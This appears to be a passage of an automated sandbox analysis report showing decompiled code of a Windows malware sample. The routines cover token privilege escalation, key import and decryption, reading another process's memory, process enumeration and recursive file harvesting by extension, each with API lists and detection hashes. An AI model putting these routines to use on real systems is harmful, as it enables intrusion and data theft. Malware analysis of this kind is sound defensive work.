0x00000000
0x00000000
0x00000000
0x005c8dae
0x005c8db0
0x00000000
0x005c8db0
0x005c8cf8
0x005c8cff
0x00000000
0x00000000
0x00000000

APIs

GetCurrentProcess.KERNEL32 ref: 005C8D0D
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005C8D19
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005C8D3A
AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 005C8D68
RevertToSelf.ADVAPI32 ref: 005C8DD9
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 005C8E04
CloseHandle.KERNEL32(FFFFFFFF), ref: 005C8E19

Part of subcall function 005D18C0: LoadLibraryW.KERNEL32(?), ref: 005D18DC
Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D18FD
Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1911
Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1925
Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1939

AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,00000000,00000000), ref: 005C8E39
CloseHandle.KERNEL32 ref: 005C8E42

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: AddressProcToken$AdjustCloseHandlePrivilegesProcess$CurrentDuplicateLibraryLoadLookupOpenPrivilegeRevertSelfValue
String ID:
API String ID: 1504140195-0
Opcode ID: ed03c699aac614b8f99cc0771f81a25622e9d6faf849906da5bcc6383703a46e
Instruction ID: df533087ae5aedc7693bca5133c9e74305284a1243d5f273339a8b3e416d2a1f
Opcode Fuzzy Hash: ed03c699aac614b8f99cc0771f81a25622e9d6faf849906da5bcc6383703a46e
Instruction Fuzzy Hash: 92411970205202AFE724DF64DC49FAA7BE8FB94750F04491EB496D61E0EBB0D848DB62

Uniqueness

Uniqueness Score: -1.00%

Function 005D5AB0, Relevance: 10.6, APIs: 7, Instructions: 115
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E005D5AB0(intOrPtr* _a4) {
				BYTE* _v0;
				intOrPtr _v8;
				intOrPtr _v40;
				int _v64;
				char _v68;
				long* _v72;
				char _v80;
				long* _v88;
				intOrPtr _v92;
				char _v104;
				intOrPtr _v116;
				intOrPtr _v132;
				char _v144;
				long* _v148;
				intOrPtr* _t22;
				long* _t24;
				long* _t25;
				int* _t34;
				BYTE* _t37;
				DWORD* _t39;
				intOrPtr* _t42;
				char* _t43;
				long* _t46;
				int _t47;
				BYTE* _t49;
				HCRYPTKEY* _t51;

				_t49 = 0;
				_t22 =  &_v68;
				 *_t22 = 0;
				 *_t51 = 0;
				_v72 = 0;
				_push(0xf0000000);
				_push(0x18);
				_push(0);
				_push(0);
				_push(_t22);
				if( *0x5d9e08() == 0) {
					_t46 = 0;
				} else {
					_t43 =  &_v68;
					 *((intOrPtr*)(_t43 - 0xc)) = 0x208;
					 *((intOrPtr*)(_t43 - 8)) = 0x6610;
					 *((intOrPtr*)(_t43 - 4)) = 0x20;
					E005CC400(_t43, _v8, 0x20);
					_t51 =  &(_t51[3]);
					if(CryptImportKey(_v88,  &_v80, 0x2c, 0, 1, _t51) == 0) {
						L7:
						_t46 = 0;
						goto L8;
					} else {
						_t34 =  &_v104;
						 *_t34 = 1;
						_push(0);
						_push(_t34);
						_push(4);
						_push(_v116);
						if( *0x5d9e10() == 0) {
							goto L7;
						} else {
							_push(0);
							_push(_v40);
							_push(1);
							_push(_v132);
							if( *0x5d9e10() == 0) {
								goto L7;
							} else {
								_t47 = _v64;
								_t37 = E005C3180(_t47, 0);
								_t51 =  &(_t51[2]);
								if(_t37 == 0) {
									goto L7;
								} else {
									_t49 = _t37;
									E005CC400(_t37, _v68, _t47);
									_t51 =  &(_t51[3]);
									_t39 =  &_v144;
									 *_t39 = _t47;
									_t46 = 0;
									if(CryptDecrypt(_v148, 0, 1, 0, _t49, _t39) == 0) {
										E005C91E0(_t49);
										_t51 =  &(_t51[1]);
										L8:
										_t49 = 0;
									} else {
										_t46 = 1;
									}
								}
							}
						}
					}
				}
				_t24 =  *_t51;
				if(_t24 != 0) {
					CryptDestroyKey(_t24);
				}
				_t25 = _v88;
				_t42 = _a4;
				if(_t25 != 0) {
					CryptReleaseContext(_t25, 0);
				}
				_v0 = _t49;
				 *_t42 = _v92;
				return _t46;
			}

0x005d5ab7
0x005d5ab9
0x005d5abd
0x005d5abf
0x005d5ac2
0x005d5ac6
0x005d5acb
0x005d5acd
0x005d5ace
0x005d5acf
0x005d5ad8
0x005d5ba0
0x005d5ade
0x005d5ae2
0x005d5aeb
0x005d5af2
0x005d5af9
0x005d5aff
0x005d5b04
0x005d5b21
0x005d5b9a
0x005d5b9a
0x00000000
0x005d5b23
0x005d5b23
0x005d5b27
0x005d5b2d
0x005d5b2f
0x005d5b30
0x005d5b32
0x005d5b3e
0x00000000
0x005d5b40
0x005d5b40
0x005d5b42
0x005d5b46
0x005d5b48
0x005d5b54
0x00000000
0x005d5b56
0x005d5b56
0x005d5b5d
0x005d5b62
0x005d5b67
0x00000000
0x005d5b69
0x005d5b69
0x005d5b71
0x005d5b76
0x005d5b79
0x005d5b7d
0x005d5b7f
0x005d5b93
0x005d5bdf
0x005d5be4
0x005d5b9c
0x005d5b9c
0x005d5b95
0x005d5b97
0x005d5b97
0x005d5b93
0x005d5b67
0x005d5b54
0x005d5b3e
0x005d5b21
0x005d5ba2
0x005d5ba7
0x005d5baa
0x005d5baa
0x005d5bb0
0x005d5bb4
0x005d5bbe
0x005d5bc3
0x005d5bc3
0x005d5bc9
0x005d5bd0
0x005d5bdb

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,005D48B5,?,?,00000020,?,?,?,?,00000020), ref: 005D5AD0
CryptImportKey.ADVAPI32(?,?,0000002C,00000000,00000001), ref: 005D5B19
CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 005D5B36
CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 005D5B4C

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?), ref: 005D5B8B
CryptDestroyKey.ADVAPI32(00000000,?,?,?,00000020,?,?,00000020,?,?,?,?,?,00000002,00000000,00000002), ref: 005D5BAA
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,00000020,?,?,00000020,?,?,?,?,?,00000002,00000000), ref: 005D5BC3

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Crypt$ContextHeapParam$AcquireAllocateDecryptDestroyImportProcessRelease
String ID:
API String ID: 2876648536-0
Opcode ID: 710b6ada629d247a63ff83874d9170e9e97d695b1aa6f3cbb9f253a196cc0e18
Instruction ID: 48a5f569959f2dcdca22e346f32b72ab776165f5111bb2b1bf52ddab2075a483
Opcode Fuzzy Hash: 710b6ada629d247a63ff83874d9170e9e97d695b1aa6f3cbb9f253a196cc0e18
Instruction Fuzzy Hash: 763168B1204300AFE7209F65DC49F6BBFA9FFC1B01F14881BB84696290E7B1D804DB62

Uniqueness

Uniqueness Score: -1.00%

Function 005D1800, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005D1800(void* _a4) {
				intOrPtr _v236;
				long _v276;
				intOrPtr _v280;
				void _v340;
				void _v348;
				void* _v360;
				void* _v372;
				void _v380;
				void* _t25;
				DWORD* _t28;
				void* _t29;
				union _PROCESSINFOCLASS _t30;
				DWORD* _t32;

				_t29 = _a4;
				_t30 = 0;
				if(NtQueryInformationProcess(_t29, 0,  &_v348, 0x18, 0) >= 0) {
					_t25 =  &_v276;
					 *_t25 = 0;
					if(ReadProcessMemory(_t29, _v360,  &_v380, 0x10, _t25) != 0 && _v276 == 0x10) {
						_v276 = 0;
						if(ReadProcessMemory(_t29, _v372,  &_v340, 0x40, _t25) != 0 && _v276 == 0x40) {
							_t28 = _t32;
							 *_t28 = 0;
							if(ReadProcessMemory(_t29, _v372 + _v280, _t25, 0xf8, _t28) != 0 &&  *_t32 == 0xf8) {
								_t30 = _v372 + _v236;
							}
						}
					}
				}
				return _t30;
			}

0x005d1809
0x005d1810
0x005d1824
0x005d182e
0x005d1836
0x005d184a
0x005d1857
0x005d1871
0x005d187e
0x005d1880
0x005d189b
0x005d18aa
0x005d18aa
0x005d189b
0x005d1871
0x005d184a
0x005d18bc

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 005D181C
ReadProcessMemory.KERNEL32(?,?,?,00000010,?), ref: 005D1842
ReadProcessMemory.KERNEL32(?,?,?,00000040,?), ref: 005D1869
ReadProcessMemory.KERNEL32(?,?,?,000000F8), ref: 005D1893

Strings

@, xrefs: 005D1873

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Process$MemoryRead$InformationQuery
String ID: @
API String ID: 3059065599-2766056989
Opcode ID: f4ed3c6d2504dcd494e9e80b4d8fb9d5a31babcae5a8fdb15a6dee73ceeec33b
Instruction ID: 56feee89ca800fb2510035fcab92645b01a10421a54afe105a23163131d3baf9
Opcode Fuzzy Hash: f4ed3c6d2504dcd494e9e80b4d8fb9d5a31babcae5a8fdb15a6dee73ceeec33b
Instruction Fuzzy Hash: 2A114AB1204301AFE6308F14DD84FBB7BACEB91756F00851AB95496380D770AC05EB66

Uniqueness

Uniqueness Score: -1.00%

Function 005D5710, Relevance: 7.8, APIs: 5, Instructions: 256
filesleepstringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E005D5710() {
				void* _t96;
				void** _t97;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed char _t104;
				int _t106;
				void** _t112;
				signed short _t113;
				void* _t115;
				void* _t122;
				void* _t125;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				void* _t131;
				void* _t132;
				signed int _t133;
				void** _t134;
				intOrPtr* _t136;
				signed short* _t137;
				signed short* _t139;
				signed short* _t140;
				void** _t144;
				void* _t145;
				void* _t146;
				signed int _t147;
				void* _t148;
				void* _t151;
				void* _t153;
				void** _t154;
				void* _t155;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t165;
				signed int _t168;
				signed int _t169;
				WCHAR* _t170;
				void* _t171;
				void** _t172;
				void** _t173;

				_t155 = _t172[0x29e];
				_t96 = _t172[0x29d];
				_t146 = _t172[0x29c];
				_t131 = 0xfffffc00;
				while(1) {
					_t157 =  *(_t146 + _t131 + 0x400) & 0x0000ffff;
					if(_t157 == 0) {
						break;
					}
					 *(_t172 + _t131 + 0x65c) = _t157;
					_t131 = _t131 + 2;
					if(_t131 != 0) {
						continue;
					}
					 *((short*)(_t172 + _t131 + 0x65a)) = 0;
					L42:
					return 0;
				}
				 *(_t172 + _t131 + 0x65c) = 0;
				if(_t96 == 0) {
					L22:
					_t132 = 0x200;
					_t97 =  &(_t172[0x97]);
					while( *_t97 != 0) {
						_t97 =  &(_t97[0]);
						_t132 = _t132 - 1;
						if(_t132 != 0) {
							continue;
						}
						goto L42;
					}
					_t158 = 0;
					while(1) {
						_t147 = _t158;
						_t34 = _t158 + 0x5d9c1c; // 0x5c
						_t159 =  *(_t158 + _t34) & 0x0000ffff;
						if(_t159 == 0) {
							break;
						}
						 *(_t97 + _t147 * 2) = _t159;
						_t37 = _t147 + 1; // 0x1
						_t158 = _t37;
						if(_t132 != _t158) {
							continue;
						}
						 *(_t97 + _t147 * 2) = 0;
						goto L42;
					}
					 *(_t97 + _t147 * 2) = 0;
					_t98 = 0xfffffc00;
					while(1) {
						_t133 =  *(_t172 + _t98 + 0x65c) & 0x0000ffff;
						if(_t133 == 0) {
							break;
						}
						 *(_t172 + _t98 + 0xa5c) = _t133;
						_t98 = _t98 + 2;
						if(_t98 != 0) {
							continue;
						}
						 *((short*)(_t172 + _t98 + 0xa5a)) = 0;
						goto L42;
					}
					_t134 =  &(_t172[0x97]);
					_t148 = 0x200;
					 *(_t172 + _t98 + 0xa5c) = 0;
					while( *_t134 != 0) {
						_t134 =  &(_t134[0]);
						_t148 = _t148 - 1;
						if(_t148 != 0) {
							continue;
						}
						return 0;
					}
					_t160 = 0;
					while(1) {
						_t99 = _t160;
						_t52 = _t160 + 0x5d9ba4; // 0x2a005c
						_t161 =  *(_t160 + _t52) & 0x0000ffff;
						if(_t161 == 0) {
							break;
						}
						 *(_t134 + _t99 * 2) = _t161;
						_t55 = _t99 + 1; // 0x1
						_t160 = _t55;
						if(_t148 != _t160) {
							continue;
						}
						 *(_t134 + _t99 * 2) = 0;
						goto L42;
					}
					 *(_t134 + _t99 * 2) = 0;
					_t101 = FindFirstFileW( &(_t172[0x97]),  &(_t172[3]));
					 *_t172 = _t101;
					if(_t101 == 0xffffffff) {
						L75:
						return 1;
					}
					_t136 =  *0x5d9d94;
					_t170 =  &(_t172[0xe]);
					do {
						_t104 = _t172[3].dwFileAttributes;
						_t125 = 0;
						if((_t104 & 0x00000002) != 0) {
							goto L72;
						}
						if((_t104 & 0x00000010) != 0) {
							_push(0x5d9aa4);
							_push(_t170);
							if( *_t136() != 0 && lstrcmpiW(_t170, 0x5d9c3a) != 0) {
								_push(_t155);
								_push(_t170);
								_push( &(_t172[0x199]));
								E005D5710();
								_t172 =  &(_t172[3]);
							}
							L71:
							goto L72;
						}
						_t171 = 0;
						_t112 =  &(_t172[0xd]);
						while( *(_t172 + _t171 + 0x38) != 0) {
							_t171 = _t171 + 2;
							_t112 =  &(_t112[0]);
							if(_t171 != 0x400) {
								continue;
							}
							L55:
							_t125 = 0;
							goto L72;
						}
						_t137 = _t172 + _t171 + 0x36;
						_t125 = 0;
						if(_t137 <=  &(_t172[0xe])) {
							goto L72;
						}
						_t125 = 0;
						if(( *_t137 & 0x0000ffff) != 0x2e) {
							_t151 = 1;
							while(1) {
								_t165 = _t151;
								_t139 = _t112;
								if(_t139 <=  &(_t172[0xe])) {
									break;
								}
								_t89 = _t165 + 1; // 0x2
								_t151 = _t89;
								_t112 = _t139 - 2;
								if(( *_t139 & 0x0000ffff) != 0x2e) {
									continue;
								}
								break;
							}
							_t155 = _t172[0x29e];
							_t140 =  &(_t139[1]);
							L66:
							if(_t165 != 3) {
								goto L71;
							}
							_t113 =  *_t140;
							if(_t113 == 0x6e0069) {
								if(_t140[2] != 0x69) {
									goto L72;
								}
								L47:
								_t64 = _t171 + 2; // 0x2
								_t172[3].dwFileAttributes = _t64;
								_t115 = E005C3180(_t64, 0);
								_t172 =  &(_t172[2]);
								_t125 = 0;
								_t172[1] = _t115;
								if(_t115 == 0) {
									goto L72;
								}
								E005CC400(_t115,  &(_t172[0xf]), _t172[2]);
								_t173 =  &(_t172[3]);
								 *((short*)(_t173[1] + _t171)) = 0;
								E005C1200( *_t155,  &(_t173[1]));
								E005D7410( &(_t173[0x199]),  &(_t172[0xf]), _t155);
								_t172 =  &(_t173[3]);
								_t122 = E005CC430( *((intOrPtr*)(_t155 + 8)));
								_t125 = 1;
								if(_t122 > 0x10000) {
									goto L72;
								}
								Sleep(0x64);
								goto L55;
							}
							if(_t113 != 0x780074) {
								goto L72;
							}
							if(_t140[2] == 0x74) {
								goto L47;
							}
							goto L72;
						}
						_t140 = _t172 + _t171 + 0x38;
						_t165 = 0;
						goto L66;
						L72:
						_t106 = FindNextFileW(_t172[1],  &(_t172[3]));
						_t136 =  *0x5d9d94;
						_t170 =  &(_t172[0xe]);
					} while (_t125 == 0 && _t106 != 0);
					FindClose( *_t172);
					goto L75;
				}
				_t153 = 0x200;
				_t144 =  &(_t172[0x97]);
				while( *_t144 != 0) {
					_t144 =  &(_t144[0]);
					_t153 = _t153 - 1;
					if(_t153 != 0) {
						continue;
					}
					goto L42;
				}
				_t127 = 0;
				while(1) {
					_t168 = _t127;
					_t14 = _t127 + 0x5d9c1c; // 0x5c
					_t128 =  *(_t127 + _t14) & 0x0000ffff;
					if(_t128 == 0) {
						break;
					}
					 *(_t144 + _t168 * 2) = _t128;
					_t17 = _t168 + 1; // 0x1
					_t127 = _t17;
					if(_t153 != _t127) {
						continue;
					}
					 *(_t144 + _t168 * 2) = 0;
					goto L42;
				}
				 *(_t144 + _t168 * 2) = 0;
				_t154 =  &(_t172[0x97]);
				_t145 = 0x200;
				while( *_t154 != 0) {
					_t154 =  &(_t154[0]);
					_t145 = _t145 - 1;
					if(_t145 != 0) {
						continue;
					}
					goto L42;
				}
				_t129 = 0;
				while(1) {
					_t169 = _t129;
					_t130 =  *(_t96 + _t129 * 2) & 0x0000ffff;
					if(_t130 == 0) {
						break;
					}
					 *(_t154 + _t169 * 2) = _t130;
					_t27 = _t169 + 1; // 0x1
					_t129 = _t27;
					if(_t145 != _t129) {
						continue;
					}
					 *(_t154 + _t169 * 2) = 0;
					goto L42;
				}
				 *(_t154 + _t169 * 2) = 0;
				goto L22;
			}

0x005d571a
0x005d5721
0x005d5728
0x005d572f
0x005d5734
0x005d5734
0x005d573f
0x00000000
0x00000000
0x005d5741
0x005d5749
0x005d574c
0x00000000
0x00000000
0x005d574e
0x005d58b9
0x00000000
0x005d58b9
0x005d575f
0x005d5769
0x005d57ff
0x005d57ff
0x005d5804
0x005d580b
0x005d5811
0x005d5814
0x005d5815
0x00000000
0x00000000
0x00000000
0x005d5817
0x005d581c
0x005d581e
0x005d581e
0x005d5820
0x005d5820
0x005d582b
0x00000000
0x00000000
0x005d582d
0x005d5831
0x005d5831
0x005d5836
0x00000000
0x00000000
0x005d5838
0x00000000
0x005d5838
0x005d5840
0x005d5846
0x005d584b
0x005d584b
0x005d5856
0x00000000
0x00000000
0x005d5858
0x005d5860
0x005d5863
0x00000000
0x00000000
0x005d5865
0x00000000
0x005d5865
0x005d5871
0x005d5878
0x005d587d
0x005d5887
0x005d588d
0x005d5892
0x005d5893
0x00000000
0x00000000
0x00000000
0x005d5893
0x005d5897
0x005d5899
0x005d5899
0x005d589b
0x005d589b
0x005d58a6
0x00000000
0x00000000
0x005d58a8
0x005d58ac
0x005d58ac
0x005d58b1
0x00000000
0x00000000
0x005d58b3
0x00000000
0x005d58b3
0x005d58c6
0x005d58d9
0x005d58e2
0x005d58e5
0x005d5a9b
0x00000000
0x005d5a9d
0x005d58eb
0x005d58f7
0x005d598e
0x005d598e
0x005d5992
0x005d5996
0x00000000
0x00000000
0x005d599e
0x005d59c3
0x005d59c8
0x005d59cf
0x005d59e5
0x005d59e6
0x005d59ee
0x005d59ef
0x005d59f4
0x005d59f4
0x005d5a6b
0x00000000
0x005d5a6b
0x005d59a0
0x005d59a2
0x005d59a6
0x005d59ae
0x005d59b1
0x005d59ba
0x00000000
0x00000000
0x005d59bc
0x005d59bc
0x00000000
0x005d59bc
0x005d59f9
0x005d5a01
0x005d5a05
0x00000000
0x00000000
0x005d5a0a
0x005d5a0f
0x005d5a1b
0x005d5a1c
0x005d5a1c
0x005d5a1e
0x005d5a26
0x00000000
0x00000000
0x005d5a2b
0x005d5a2b
0x005d5a2e
0x005d5a34
0x00000000
0x00000000
0x00000000
0x005d5a34
0x005d5a36
0x005d5a3d
0x005d5a40
0x005d5a43
0x00000000
0x00000000
0x005d5a45
0x005d5a4c
0x005d590a
0x00000000
0x00000000
0x005d5910
0x005d5910
0x005d5915
0x005d591a
0x005d591f
0x005d5922
0x005d5926
0x005d592a
0x00000000
0x00000000
0x005d593c
0x005d5941
0x005d5948
0x005d5955
0x005d5964
0x005d5969
0x005d596f
0x005d5979
0x005d597e
0x00000000
0x00000000
0x005d5986
0x00000000
0x005d5986
0x005d5a5d
0x00000000
0x00000000
0x005d5a63
0x00000000
0x00000000
0x00000000
0x005d5a69
0x005d5a11
0x005d5a15
0x00000000
0x005d5a71
0x005d5a7a
0x005d5a7c
0x005d5a84
0x005d5a84
0x005d5a95
0x00000000
0x005d5a95
0x005d576f
0x005d5774
0x005d577b
0x005d5781
0x005d5784
0x005d5785
0x00000000
0x00000000
0x00000000
0x005d5787
0x005d578c
0x005d578e
0x005d578e
0x005d5790
0x005d5790
0x005d579b
0x00000000
0x00000000
0x005d579d
0x005d57a1
0x005d57a1
0x005d57a6
0x00000000
0x00000000
0x005d57a8
0x00000000
0x005d57a8
0x005d57b3
0x005d57b9
0x005d57c0
0x005d57c5
0x005d57cb
0x005d57ce
0x005d57cf
0x00000000
0x00000000
0x00000000
0x005d57d1
0x005d57d6
0x005d57d8
0x005d57d8
0x005d57da
0x005d57e1
0x00000000
0x00000000
0x005d57e3
0x005d57e7
0x005d57e7
0x005d57ec
0x00000000
0x00000000
0x005d57ee
0x00000000
0x005d57ee
0x005d57f9
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?), ref: 005D58D9
Sleep.KERNEL32(00000064,?,?,?), ref: 005D5986
lstrcmpiW.KERNEL32(?,005D9C3A), ref: 005D59DB
FindNextFileW.KERNEL32(?,?), ref: 005D5A7A
FindClose.KERNEL32 ref: 005D5A95

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Find$File$CloseFirstNextSleeplstrcmpi
String ID:
API String ID: 2811834920-0
Opcode ID: 982d76bd4eeb01b9bc422654d17ca7a517567e0d7c5f6319a75140e2bf778491
Instruction ID: 48d51debf3b949e529f22faa1650b22546443f5c10e53b20e3201946ce0f2137
Opcode Fuzzy Hash: 982d76bd4eeb01b9bc422654d17ca7a517567e0d7c5f6319a75140e2bf778491
Instruction Fuzzy Hash: 3591F331904B11DBD7309B68C894A7ABBE6FF90316F64892FE4468B3A1F7319C45D782

Uniqueness

Uniqueness Score: -1.00%

Function 005CC440, Relevance: 7.6, APIs: 5, Instructions: 67
processstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005CC440() {
				WCHAR* _v4;
				char _v1048;
				char _v1568;
				intOrPtr _v1596;
				void* _t14;
				struct tagPROCESSENTRY32W* _t16;
				signed int _t26;
				void* _t27;
				int _t31;
				WCHAR* _t32;
				struct tagPROCESSENTRY32W _t33;
				void* _t40;

				_t14 = CreateToolhelp32Snapshot(2, 0);
				if(_t14 == 0xffffffff) {
					_t31 = 0;
					L9:
					return _t31;
				}
				_t27 = _t14;
				_t16 = _t33;
				 *_t16 = 0x22c;
				Process32FirstW(_t27, _t16);
				_t26 = 0;
				if(_t16 == 0) {
					L6:
					CloseHandle(_t27);
					_t31 = 0;
					if(_t26 > 0) {
						_t31 = E005C3180(4 + _t26 * 4, 0);
						E005CC400(_t31,  &_v1048, _t26 * 4);
						 *((intOrPtr*)(_t31 + _t26 * 4)) = 0;
					}
					goto L9;
				}
				_t26 = 0;
				_t32 =  &_v1568;
				do {
					if(lstrcmpW(_v4, _t32) != 0) {
						goto L5;
					}
					_t40 = _t26 - 0xfd;
					 *((intOrPtr*)(_t33 + 0x22c + _t26 * 4)) = _v1596;
					_t26 = _t26 + 1;
					if(_t40 > 0) {
						goto L6;
					}
					L5:
				} while (Process32NextW(_t27, _t33) != 0);
				goto L6;
			}

0x005cc44e
0x005cc457
0x005cc4fa
0x005cc4fc
0x005cc508
0x005cc508
0x005cc45d
0x005cc45f
0x005cc461
0x005cc469
0x005cc471
0x005cc476
0x005cc4b6
0x005cc4b7
0x005cc4bf
0x005cc4c4
0x005cc4e0
0x005cc4ec
0x005cc4f4
0x005cc4f4
0x00000000
0x005cc4c4
0x005cc47e
0x005cc480
0x005cc484
0x005cc490
0x00000000
0x00000000
0x005cc496
0x005cc49c
0x005cc4a3
0x005cc4a6
0x00000000
0x00000000
0x005cc4a8
0x005cc4b2
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005CC44E
Process32FirstW.KERNEL32(00000000), ref: 005CC469
lstrcmpW.KERNEL32(?,?), ref: 005CC48C
Process32NextW.KERNEL32(00000000), ref: 005CC4AC
CloseHandle.KERNEL32(00000000), ref: 005CC4B7

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmp
String ID:
API String ID: 2964220450-0
Opcode ID: 6a0da191e35a3eebc0de66f1e6e7e22f9ed7fea7ab45add4cddf1ef5eee4ef72
Instruction ID: b8de8a0eca20497932fe4eda913ff19fe46bd471cbe39ff78ef104fd7afd3cde
Opcode Fuzzy Hash: 6a0da191e35a3eebc0de66f1e6e7e22f9ed7fea7ab45add4cddf1ef5eee4ef72
Instruction Fuzzy Hash: 981193716002046FD7206FB9ECC9FBB3FADEB85755F10812AE90CD6161EA259C1987A1

Uniqueness

Uniqueness Score: -1.00%

Function 005C4DE0, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E005C4DE0(signed int __ecx) {
				intOrPtr _t91;
				signed int _t98;
				signed int _t100;
				intOrPtr _t102;
				signed int _t105;
				signed int _t107;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t118;
				signed int _t119;
				signed int _t122;
				signed int _t123;
				signed int _t125;
				signed int _t129;
				intOrPtr _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t137;
				signed int _t138;
				signed int _t140;
				signed int _t144;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t151;
				signed int _t153;
				signed int _t155;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int* _t172;
				signed int* _t174;
				signed int* _t175;
				signed int* _t176;
				signed int* _t177;

				_t91 =  *0x5d9b0c; // 0x26f2b8
				_t153 = 0;
				_t167 = __ecx;
				_t172[1] = 0;
				_t172[3] = 0;
				_t172[5] = 0;
				 *(_t91 + 8) = 6;
				_t5 = _t91 + 0x24; // 0x0
				_t132 =  *_t5;
				if(_t132 == 0) {
					 *(_t91 + 8) = 2;
					_t129 = 0;
					goto L15;
				} else {
					_t98 = 0xfffffffe;
					_t155 = 1;
					while( *((short*)(_t132 + _t155 * 2 - 2)) != 0) {
						_t155 = _t155 + 1;
						_t98 = _t98 + 0xfffffffe;
						if(_t155 != 0x80000000) {
							continue;
						}
						_t129 = 0;
						_t166 = 0;
						_t153 = 0;
						L24:
						_t92 = _t172[1];
						if(_t172[1] != 0) {
							E005C91E0(_t92);
							_t172 =  &(_t172[1]);
						}
						if(_t153 != 0) {
							E005C91E0(_t166);
							_t172 =  &(_t172[1]);
						}
						_t93 = _t172[3];
						if(_t172[3] != 0) {
							E005C91E0(_t93);
						}
						return _t129;
					}
					_t129 = 0;
					_t100 = E005C3180( ~_t98, 0);
					_t172 =  &(_t172[2]);
					_t166 = _t100;
					__eflags = _t100;
					if(_t100 == 0) {
						_t153 = _t166;
						L15:
						_t166 = 0;
						goto L24;
					}
					__eflags = _t155;
					if(_t155 <= 0) {
						_t129 = 0;
						__eflags = _t155;
						if(_t155 != 0) {
							 *_t166 = 0;
						}
						L23:
						_t153 = _t166;
						goto L24;
					}
					_t10 = _t155 - 1; // 0x0
					_t133 = 0;
					_t144 = 2;
					_t172[6] = _t167;
					_t172[2] = _t10;
					_t102 =  *0x5d9b0c; // 0x26f2b8
					_t13 = _t102 + 0x24; // 0x0
					_t130 =  *_t13;
					_t172[4] = 1;
					_t105 = 0;
					__eflags = 0;
					while(1) {
						_t168 =  *(_t130 + _t105 * 2) & 0x0000ffff;
						__eflags = _t168;
						if(_t168 == 0) {
							break;
						}
						 *(_t166 + _t105 * 2) = _t168;
						_t144 = _t144 + 0xfffffffe;
